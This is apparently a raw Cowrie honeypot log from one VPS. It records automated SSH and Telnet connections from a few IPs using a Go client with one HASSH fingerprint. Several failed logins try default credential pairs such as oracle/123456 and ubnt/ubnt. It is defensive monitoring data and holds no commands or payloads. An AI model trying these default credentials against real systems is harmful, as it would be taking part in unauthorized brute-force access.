{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:59:36.252409Z","src_ip":"212.227.125.160","session":"41fe2248ee6a"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:37.150213Z","src_ip":"212.227.125.160","session":"41fe2248ee6a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:59:38.375793Z","src_ip":"212.227.125.160","session":"41fe2248ee6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46818,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ade6e2f37df","protocol":"ssh","message":"New connection: 212.227.235.229:46818 (1.2.3.4:22) [session: 1ade6e2f37df]","sensor":"my-vps","timestamp":"2025-08-28T06:59:42.706358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:59:42.707435Z","src_ip":"212.227.235.229","session":"1ade6e2f37df"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:59:42.951929Z","src_ip":"212.227.235.229","session":"1ade6e2f37df"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:43.688586Z","src_ip":"212.227.235.229","session":"1ade6e2f37df"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:59:44.937424Z","src_ip":"212.227.235.229","session":"1ade6e2f37df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38370,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a16797d3a20","protocol":"ssh","message":"New connection: 212.227.125.160:38370 (1.2.3.4:22) [session: 3a16797d3a20]","sensor":"my-vps","timestamp":"2025-08-28T06:59:52.353157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:59:52.353829Z","src_ip":"212.227.125.160","session":"3a16797d3a20"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:59:52.629707Z","src_ip":"212.227.125.160","session":"3a16797d3a20"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:53.279294Z","src_ip":"212.227.125.160","session":"3a16797d3a20"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:59:54.497913Z","src_ip":"212.227.125.160","session":"3a16797d3a20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58070,"dst_ip":"1.2.3.4","dst_port":22,"session":"75a5c6f2668e","protocol":"ssh","message":"New connection: 212.227.235.229:58070 (1.2.3.4:22) [session: 75a5c6f2668e]","sensor":"my-vps","timestamp":"2025-08-28T06:59:58.952807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:59:58.953715Z","src_ip":"212.227.235.229","session":"75a5c6f2668e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:59:59.200394Z","src_ip":"212.227.235.229","session":"75a5c6f2668e"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:59.941342Z","src_ip":"212.227.235.229","session":"75a5c6f2668e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59488,"dst_ip":"1.2.3.4","dst_port":23,"session":"4477cb2c2c4d","protocol":"telnet","message":"New connection: 212.227.125.160:59488 (1.2.3.4:23) [session: 4477cb2c2c4d]","sensor":"my-vps","timestamp":"2025-08-28T06:59:59.942302Z"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:01.189240Z","src_ip":"212.227.235.229","session":"75a5c6f2668e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39298,"dst_ip":"1.2.3.4","dst_port":22,"session":"48154eaece45","protocol":"ssh","message":"New connection: 212.227.125.160:39298 (1.2.3.4:22) [session: 48154eaece45]","sensor":"my-vps","timestamp":"2025-08-28T07:00:08.614490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:00:08.617125Z","src_ip":"212.227.125.160","session":"48154eaece45"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:00:08.830858Z","src_ip":"212.227.125.160","session":"48154eaece45"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:00:09.696846Z","src_ip":"212.227.125.160","session":"48154eaece45"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:10.914470Z","src_ip":"212.227.125.160","session":"48154eaece45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45062,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9b97559bad5","protocol":"ssh","message":"New connection: 212.227.235.229:45062 (1.2.3.4:22) [session: f9b97559bad5]","sensor":"my-vps","timestamp":"2025-08-28T07:00:14.936898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:00:14.938427Z","src_ip":"212.227.235.229","session":"f9b97559bad5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:00:15.181376Z","src_ip":"212.227.235.229","session":"f9b97559bad5"}
{"eventid":"cowrie.session.closed","duration":15.499043464660645,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:15.441300Z","src_ip":"212.227.125.160","session":"4477cb2c2c4d"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:00:15.923088Z","src_ip":"212.227.235.229","session":"f9b97559bad5"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:17.167713Z","src_ip":"212.227.235.229","session":"f9b97559bad5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55622,"dst_ip":"1.2.3.4","dst_port":23,"session":"65ef0700801e","protocol":"telnet","message":"New connection: 212.227.125.160:55622 (1.2.3.4:23) [session: 65ef0700801e]","sensor":"my-vps","timestamp":"2025-08-28T07:00:19.078384Z"}
{"eventid":"cowrie.session.closed","duration":3.2398593425750732,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:22.318176Z","src_ip":"212.227.125.160","session":"65ef0700801e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48088,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d73f58eaba8","protocol":"ssh","message":"New connection: 212.227.125.160:48088 (1.2.3.4:22) [session: 6d73f58eaba8]","sensor":"my-vps","timestamp":"2025-08-28T07:00:24.096178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:00:24.096822Z","src_ip":"212.227.125.160","session":"6d73f58eaba8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:00:24.311245Z","src_ip":"212.227.125.160","session":"6d73f58eaba8"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:00:24.956709Z","src_ip":"212.227.125.160","session":"6d73f58eaba8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55652,"dst_ip":"1.2.3.4","dst_port":23,"session":"c5d37e40a447","protocol":"telnet","message":"New connection: 212.227.125.160:55652 (1.2.3.4:23) [session: c5d37e40a447]","sensor":"my-vps","timestamp":"2025-08-28T07:00:25.908184Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:26.172307Z","src_ip":"212.227.125.160","session":"6d73f58eaba8"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":52650,"dst_ip":"1.2.3.4","dst_port":23,"session":"0a3dcbe99afa","protocol":"telnet","message":"New connection: 8.222.212.69:52650 (1.2.3.4:23) [session: 0a3dcbe99afa]","sensor":"my-vps","timestamp":"2025-08-28T07:00:27.191502Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58308,"dst_ip":"1.2.3.4","dst_port":22,"session":"59f5bd14b1cf","protocol":"ssh","message":"New connection: 212.227.235.229:58308 (1.2.3.4:22) [session: 59f5bd14b1cf]","sensor":"my-vps","timestamp":"2025-08-28T07:00:30.335185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:00:30.336565Z","src_ip":"212.227.235.229","session":"59f5bd14b1cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:00:30.580890Z","src_ip":"212.227.235.229","session":"59f5bd14b1cf"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:00:31.323082Z","src_ip":"212.227.235.229","session":"59f5bd14b1cf"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:32.570100Z","src_ip":"212.227.235.229","session":"59f5bd14b1cf"}
{"eventid":"cowrie.session.closed","duration":10.26411247253418,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:36.172225Z","src_ip":"212.227.125.160","session":"c5d37e40a447"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51204,"dst_ip":"1.2.3.4","dst_port":22,"session":"91f599e1538b","protocol":"ssh","message":"New connection: 212.227.125.160:51204 (1.2.3.4:22) [session: 91f599e1538b]","sensor":"my-vps","timestamp":"2025-08-28T07:00:40.164882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:00:40.165901Z","src_ip":"212.227.125.160","session":"91f599e1538b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:00:40.379432Z","src_ip":"212.227.125.160","session":"91f599e1538b"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T07:00:41.022888Z","src_ip":"212.227.125.160","session":"91f599e1538b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:42.239240Z","src_ip":"212.227.125.160","session":"91f599e1538b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60108,"dst_ip":"1.2.3.4","dst_port":22,"session":"959216a4ae20","protocol":"ssh","message":"New connection: 212.227.235.229:60108 (1.2.3.4:22) [session: 959216a4ae20]","sensor":"my-vps","timestamp":"2025-08-28T07:00:46.596537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:00:46.597344Z","src_ip":"212.227.235.229","session":"959216a4ae20"}
